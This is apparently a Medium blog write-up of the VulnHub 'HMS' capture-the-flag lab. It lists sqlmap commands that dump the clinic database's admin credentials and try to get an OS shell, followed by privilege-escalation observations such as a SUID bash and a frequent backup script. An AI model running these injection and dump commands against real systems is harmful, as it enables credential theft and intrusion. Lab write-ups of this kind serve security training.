VulnHub Writeup: HMS

VM Running
fping results
ftp output
testing out the new port
Default login page
Burp Intercept for Login page
  • sqlmap -r hms.req — dbms=mysql — current-db — current-user → So we are root@localhost in the “clinic_db”
  • sqlmap -r hms.req — dbms=mysql -D clinic_db — tables → so quite a few tables available, let’s start enumerating
  • sqlmap -r hms.req — dbms=mysql -D clinic_db -T user — dump → Empty, rats
  • sqlmap -r hms.req — dbms=mysql -D clinic_db -T admin — dump → Alright, that gives us one user (admin) with an email, password hash, and name.
  • sqlmap -r hms.req — dbms=mysql — os-shell → unable to pull a shell automatically, rats but had to try.
login.php secrets
john custom format
service-level shell
  • It appears Eren has a backup script that runs every 5 seconds. Soon as we get read/write access to that it should help.
  • gcc/g++ is available so we can compile exploits if we need.
  • Port 631 is actively listening on localhost
  • nivek is in quite a few good groups if we can impersonate him
  • bash has a SUID bit as eren
  • Not sure why I own the at command, but I do
  • Quite a few backup files.
lateral to the user eren
They way to root




Cyber Enthusiast and sharing some knowledge in a systematic way

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

How to Combat Racist Zoom Bombers

Black pound day: Founders’ guide to effectively protecting and optimising your business

Search for Stores that are Kept track of by Third-PartyOrganizations

Blocking Ads with AdGuard Home on a Raspberry Pi in 10 Minutes

Cloud Identity for grannies

finger prints of two palms

Cryptography Glossary (with java insights)

exit to the forest

Easy ways what you can do to protect your digital identity

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store


Cyber Enthusiast and sharing some knowledge in a systematic way

More from Medium

How we survived the Log4J vulnerability sofar and what to expect in…

Malicious Process Detection 1 — Log Analysis — Security | Sysmon | T1055

How To Detect And Fix CVE-2021–24867- Backdoor In AccessPress Themes And Plugins

Log4Shell Part 2: Discovery, Mitigation, and a Digital Vaccine!